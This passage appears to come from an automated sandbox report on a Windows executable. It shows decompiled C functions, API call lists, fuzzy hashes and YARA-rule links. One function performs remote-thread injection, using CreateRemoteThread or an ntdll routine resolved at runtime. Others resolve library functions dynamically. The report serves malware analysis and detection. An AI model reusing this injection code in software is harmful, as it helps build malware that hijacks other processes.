                                                                                                                                                                                                                          0x004073fc
                                                                                                                                                                                                                          0x00407400
                                                                                                                                                                                                                          0x0040740f
                                                                                                                                                                                                                          0x00407412
                                                                                                                                                                                                                          0x00407412
                                                                                                                                                                                                                          0x00407402
                                                                                                                                                                                                                          0x00407402
                                                                                                                                                                                                                          0x00407407
                                                                                                                                                                                                                          0x00407407
                                                                                                                                                                                                                          0x00407413
                                                                                                                                                                                                                          0x00407419
                                                                                                                                                                                                                          0x00407419
                                                                                                                                                                                                                          0x00407419
                                                                                                                                                                                                                          0x0040742f
                                                                                                                                                                                                                          0x00407434
                                                                                                                                                                                                                          0x00407437
                                                                                                                                                                                                                          0x00407439
                                                                                                                                                                                                                          0x0040743b
                                                                                                                                                                                                                          0x0040743b
                                                                                                                                                                                                                          0x0040744e
                                                                                                                                                                                                                          0x00407453
                                                                                                                                                                                                                          0x00407453
                                                                                                                                                                                                                          0x004073af
                                                                                                                                                                                                                          0x004073b2
                                                                                                                                                                                                                          0x004073ba
                                                                                                                                                                                                                          0x004073bb
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004073bd
                                                                                                                                                                                                                          0x004073c3
                                                                                                                                                                                                                          0x004073c3
                                                                                                                                                                                                                          0x004073bb
                                                                                                                                                                                                                          0x0040745c
                                                                                                                                                                                                                          0x00407468
                                                                                                                                                                                                                          0x00407468
                                                                                                                                                                                                                          0x0040746d
                                                                                                                                                                                                                          0x00407473
                                                                                                                                                                                                                          0x0040747c
                                                                                                                                                                                                                          0x0040748e

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 004073A4
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 004073B2
                                                                                                                                                                                                                            • Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
                                                                                                                                                                                                                            • Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcschr$memcpywcslen
                                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                                          • API String ID: 1983396471-123907689
                                                                                                                                                                                                                          • Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                                                                                                                          • Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040A272, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70threadinjectionCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                                                          			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
				void* _v8;
				char _v12;
				char* _v20;
				long _v24;
				intOrPtr _v28;
				char* _v36;
				signed int _v40;
				void _v44;
				char _v48;
				char _v52;
				struct _OSVERSIONINFOW _v328;
				void* __esi;
				signed int _t40;
				intOrPtr* _t44;
				void* _t49;
				struct HINSTANCE__** _t54;
				signed int _t55;

				_t54 = __eax;
				_v328.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v328);
				if(_v328.dwMajorVersion < 6) {
					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
				}
				E0040A1EF(_t54);
				_t44 =  *((intOrPtr*)(_t54 + 4));
				if(_t44 != 0) {
					_t55 = 8;
					memset( &_v44, 0, _t55 << 2);
					_v12 = 0;
					asm("stosd");
					_v36 =  &_v12;
					_v20 =  &_v52;
					_v48 = 0x24;
					_v44 = 0x10003;
					_v40 = _t55;
					_v28 = 0x10004;
					_v24 = 4;
					_a16 = 0;
					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
					asm("sbb eax, eax");
					return  !( ~_t40) & _a16;
				}
				return 0;
			}




















                                                                                                                                                                                                                          0x0040a27d
                                                                                                                                                                                                                          0x0040a286
                                                                                                                                                                                                                          0x0040a290
                                                                                                                                                                                                                          0x0040a29d
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040a32f
                                                                                                                                                                                                                          0x0040a29f
                                                                                                                                                                                                                          0x0040a2a4
                                                                                                                                                                                                                          0x0040a2ad
                                                                                                                                                                                                                          0x0040a2b6
                                                                                                                                                                                                                          0x0040a2bc
                                                                                                                                                                                                                          0x0040a2be
                                                                                                                                                                                                                          0x0040a2c4
                                                                                                                                                                                                                          0x0040a2c8
                                                                                                                                                                                                                          0x0040a2ce
                                                                                                                                                                                                                          0x0040a2e3
                                                                                                                                                                                                                          0x0040a2ed
                                                                                                                                                                                                                          0x0040a2fb
                                                                                                                                                                                                                          0x0040a2fe
                                                                                                                                                                                                                          0x0040a305
                                                                                                                                                                                                                          0x0040a30c
                                                                                                                                                                                                                          0x0040a30f
                                                                                                                                                                                                                          0x0040a313
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040a31a
                                                                                                                                                                                                                          0x0040a338

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetVersionExW.KERNEL32(?,73B768A0,00000000), ref: 0040A290
                                                                                                                                                                                                                          • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F
                                                                                                                                                                                                                            • Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                                                                                                                            • Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                          • API String ID: 283512611-3993045852
                                                                                                                                                                                                                          • Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                                                                                                                          • Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00401676, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 45%
                                                                                                                                                                                                                          			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v80;
				signed short _v65616;
				void* _t27;
				intOrPtr _t28;
				void* _t34;
				intOrPtr _t39;
				intOrPtr* _t51;
				void* _t52;

				_t51 = __esi;
				E0040B550(0x1004c, __ecx);
				_t39 = 0;
				_push(0);
				_push( &_v8);
				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
				_push(L"Lines");
				_t27 =  *((intOrPtr*)( *__esi))();
				if(_v8 > 0) {
					do {
						_t6 = _t39 + 1; // 0x1
						_t28 = _t6;
						_push(_t28);
						_push(L"Line%d");
						_v12 = _t28;
						_push(0x1f);
						_push( &_v80);
						L0040B1EC();
						_t52 = _t52 + 0x10;
						_push(0x7fff);
						_push(0x40c4e8);
						if( *((intOrPtr*)(_t51 + 4)) == 0) {
							_v65616 = _v65616 & 0x00000000;
							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
							_t34 = E004054DF(_a4, _t51,  &_v65616);
						} else {
							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
						}
						_t39 = _v12;
					} while (_t39 < _v8);
					return _t34;
				}
				return _t27;
			}













                                                                                                                                                                                                                          0x00401676
                                                                                                                                                                                                                          0x0040167e
                                                                                                                                                                                                                          0x0040168a
                                                                                                                                                                                                                          0x0040168c
                                                                                                                                                                                                                          0x00401690
                                                                                                                                                                                                                          0x00401691
                                                                                                                                                                                                                          0x00401696
                                                                                                                                                                                                                          0x0040169d
                                                                                                                                                                                                                          0x004016a2
                                                                                                                                                                                                                          0x004016aa
                                                                                                                                                                                                                          0x004016aa
                                                                                                                                                                                                                          0x004016aa
                                                                                                                                                                                                                          0x004016ad
                                                                                                                                                                                                                          0x004016ae
                                                                                                                                                                                                                          0x004016b3
                                                                                                                                                                                                                          0x004016b9
                                                                                                                                                                                                                          0x004016bb
                                                                                                                                                                                                                          0x004016bc
                                                                                                                                                                                                                          0x004016c1
                                                                                                                                                                                                                          0x004016c8
                                                                                                                                                                                                                          0x004016cd
                                                                                                                                                                                                                          0x004016ce
                                                                                                                                                                                                                          0x004016ea
                                                                                                                                                                                                                          0x004016ff
                                                                                                                                                                                                                          0x0040170c
                                                                                                                                                                                                                          0x004016d0
                                                                                                                                                                                                                          0x004016e3
                                                                                                                                                                                                                          0x004016e3
                                                                                                                                                                                                                          0x00401711
                                                                                                                                                                                                                          0x00401714
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00401719
                                                                                                                                                                                                                          0x0040171c

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintf
                                                                                                                                                                                                                          • String ID: Line%d$Lines
                                                                                                                                                                                                                          • API String ID: 3988819677-2790224864
                                                                                                                                                                                                                          • Opcode ID: 85c35154c4290c7e71ee3589cd3dab7edefba6c8c670df13eed484ab7778891e
                                                                                                                                                                                                                          • Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85c35154c4290c7e71ee3589cd3dab7edefba6c8c670df13eed484ab7778891e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040512F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                                                                          			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v26;
				void _v28;
				void* _t24;
				void* _t25;
				void* _t35;
				signed int _t38;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t24 = _a12;
				_t45 = _t44 - 0x18;
				_t42 = 0;
				 *_t24 = 0;
				if(_a8 <= 0) {
					_t25 = 0;
				} else {
					_t38 = 0;
					_t35 = 0;
					if(_a8 > 0) {
						_v8 = _t24;
						while(1) {
							_v28 = _v28 & 0x00000000;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_push( *(_t35 + _a4) & 0x000000ff);
							_push(L"%2.2X ");
							_push(0xa);
							_push( &_v28);
							L0040B1EC();
							_t38 = _t42;
							memcpy(_v8,  &_v28, 6);
							_t13 = _t42 + 3; // 0x3
							_t45 = _t45 + 0x1c;
							if(_t13 >= 0x2000) {
								break;
							}
							_v8 = _v8 + 6;
							_t35 = _t35 + 1;
							_t42 = _t42 + 3;
							if(_t35 < _a8) {
								continue;
							}
							break;
						}
						_t24 = _a12;
					}
					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
					_t25 = 1;
				}
				return _t25;
			}













                                                                                                                                                                                                                          0x00405132
                                                                                                                                                                                                                          0x00405135
                                                                                                                                                                                                                          0x00405139
                                                                                                                                                                                                                          0x0040513e
                                                                                                                                                                                                                          0x00405141
                                                                                                                                                                                                                          0x004051b3
                                                                                                                                                                                                                          0x00405143
                                                                                                                                                                                                                          0x00405145
                                                                                                                                                                                                                          0x00405147
                                                                                                                                                                                                                          0x0040514c
                                                                                                                                                                                                                          0x0040514e
                                                                                                                                                                                                                          0x00405151
                                                                                                                                                                                                                          0x00405151
                                                                                                                                                                                                                          0x0040515b
                                                                                                                                                                                                                          0x0040515c
                                                                                                                                                                                                                          0x0040515d
                                                                                                                                                                                                                          0x0040515e
                                                                                                                                                                                                                          0x0040515f
                                                                                                                                                                                                                          0x00405168
                                                                                                                                                                                                                          0x00405169
                                                                                                                                                                                                                          0x00405171
                                                                                                                                                                                                                          0x00405173
                                                                                                                                                                                                                          0x00405174
                                                                                                                                                                                                                          0x00405182
                                                                                                                                                                                                                          0x00405184
                                                                                                                                                                                                                          0x00405189
                                                                                                                                                                                                                          0x0040518c
                                                                                                                                                                                                                          0x00405194
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405196
                                                                                                                                                                                                                          0x0040519a
                                                                                                                                                                                                                          0x0040519b
                                                                                                                                                                                                                          0x004051a1
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004051a1
                                                                                                                                                                                                                          0x004051a3
                                                                                                                                                                                                                          0x004051a3
                                                                                                                                                                                                                          0x004051a6
                                                                                                                                                                                                                          0x004051af
                                                                                                                                                                                                                          0x004051b0
                                                                                                                                                                                                                          0x004051b7

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintfmemcpy
                                                                                                                                                                                                                          • String ID: %2.2X
                                                                                                                                                                                                                          • API String ID: 2789212964-323797159
                                                                                                                                                                                                                          • Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                                                                                                                          • Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004075BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 43%
                                                                                                                                                                                                                          			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				char _v44;
				intOrPtr _t22;
				signed int _t30;
				signed int _t34;
				void* _t35;
				void* _t36;

				_t35 = __esi;
				_t34 = 0;
				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
					do {
						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
						L0040B1EC();
						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
						_push( &_v44);
						_push(0x2000);
						_push( *((intOrPtr*)(__esi + 0x60)));
						L0040B1EC();
						_t36 = _t36 + 0x24;
						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
				}
				return E00407343(_t35, _a4, L"\r\n");
			}









                                                                                                                                                                                                                          0x004075bb
                                                                                                                                                                                                                          0x004075c2
                                                                                                                                                                                                                          0x004075c7
                                                                                                                                                                                                                          0x004075ca
                                                                                                                                                                                                                          0x004075cd
                                                                                                                                                                                                                          0x004075d8
                                                                                                                                                                                                                          0x004075e9
                                                                                                                                                                                                                          0x004075fc
                                                                                                                                                                                                                          0x00407600
                                                                                                                                                                                                                          0x00407601
                                                                                                                                                                                                                          0x00407606
                                                                                                                                                                                                                          0x00407609
                                                                                                                                                                                                                          0x0040760e
                                                                                                                                                                                                                          0x00407619
                                                                                                                                                                                                                          0x0040761e
                                                                                                                                                                                                                          0x0040761f
                                                                                                                                                                                                                          0x00407624
                                                                                                                                                                                                                          0x00407636

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintf
                                                                                                                                                                                                                          • String ID: %%-%d.%ds
                                                                                                                                                                                                                          • API String ID: 3988819677-2008345750
                                                                                                                                                                                                                          • Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                                                                                                                          • Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040507A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				wchar_t* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v20 = _a12;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				if(GetOpenFileNameW( &_v80) == 0) {
					return 0;
				} else {
					wcscpy(__esi, _v52);
					return 1;
				}
			}















                                                                                                                                                                                                                          0x00405080
                                                                                                                                                                                                                          0x00405086
                                                                                                                                                                                                                          0x0040508b
                                                                                                                                                                                                                          0x0040508e
                                                                                                                                                                                                                          0x00405091
                                                                                                                                                                                                                          0x00405097
                                                                                                                                                                                                                          0x0040509d
                                                                                                                                                                                                                          0x004050a4
                                                                                                                                                                                                                          0x004050ab
                                                                                                                                                                                                                          0x004050b2
                                                                                                                                                                                                                          0x004050b5
                                                                                                                                                                                                                          0x004050bc
                                                                                                                                                                                                                          0x004050cb
                                                                                                                                                                                                                          0x004050e0
                                                                                                                                                                                                                          0x004050cd
                                                                                                                                                                                                                          0x004050d1
                                                                                                                                                                                                                          0x004050dc
                                                                                                                                                                                                                          0x004050dc

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileNameOpenwcscpy
                                                                                                                                                                                                                          • String ID: L
                                                                                                                                                                                                                          • API String ID: 3246554996-2909332022
                                                                                                                                                                                                                          • Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                                                                                                                          • Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040906D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                                                          			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __esi;
				_Unknown_base(*)()* _t10;
				void* _t12;
				struct HINSTANCE__** _t13;

				_t13 = __eax;
				_t12 = 0;
				if(E00408F72(__eax) != 0) {
					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
					if(_t10 != 0) {
						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
					}
				}
				return _t12;
			}







                                                                                                                                                                                                                          0x00409072
                                                                                                                                                                                                                          0x00409074
                                                                                                                                                                                                                          0x0040907d
                                                                                                                                                                                                                          0x00409086
                                                                                                                                                                                                                          0x0040908e
                                                                                                                                                                                                                          0x004090a5
                                                                                                                                                                                                                          0x004090a5
                                                                                                                                                                                                                          0x0040908e
                                                                                                                                                                                                                          0x004090ac

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                                                                                          • String ID: LookupAccountSidW$Y@
                                                                                                                                                                                                                          • API String ID: 190572456-2352570548
                                                                                                                                                                                                                          • Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                                                                                                                          • Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040AD85, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                                          			E0040AD85(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;
				char** _t9;

				_t7 = 0;
				_t8 = E00405436(L"shlwapi.dll");
				 *_t9 = "SHAutoComplete";
				_t3 = GetProcAddress(_t8, ??);
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}







                                                                                                                                                                                                                          0x0040ad8c
                                                                                                                                                                                                                          0x0040ad93
                                                                                                                                                                                                                          0x0040ad95
                                                                                                                                                                                                                          0x0040ad9d
                                                                                                                                                                                                                          0x0040ada5
                                                                                                                                                                                                                          0x0040adb2
                                                                                                                                                                                                                          0x0040adb2
                                                                                                                                                                                                                          0x0040adb5
                                                                                                                                                                                                                          0x0040adbf

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                                                                                                                            • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Library$Load$AddressFreeProcmemsetwcscat
                                                                                                                                                                                                                          • String ID: shlwapi.dll
                                                                                                                                                                                                                          • API String ID: 4092907564-3792422438
